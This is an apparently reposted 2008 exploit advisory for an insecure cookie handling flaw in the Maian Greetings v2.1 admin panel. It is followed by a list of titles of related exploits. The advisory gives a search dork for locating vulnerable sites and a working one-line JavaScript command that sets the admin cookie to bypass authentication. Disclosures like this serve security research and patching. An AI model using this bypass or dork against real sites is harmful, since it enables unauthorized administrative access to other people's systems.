Author: Saime
Date: July 12, 2008
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by: Maian Greetings v2.1
Description:
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
equals admin username.
Exploit:
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"
【Maian Greetings 2.1 Insecure Cookie Handling Vulnerability】相关文章:
★ Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
★ Dreampics Builder (page) Remote SQL Injection Vulnerability
★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
★ HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
★ Maian Events 2.0 Insecure Cookie Handling Vulnerability
★ Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
★ Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities
★ MS Windows (MessageBox) Memory Corruption Local Denial of Service
★ Joomla Component EZ Store Remote Blind SQL Injection Exploit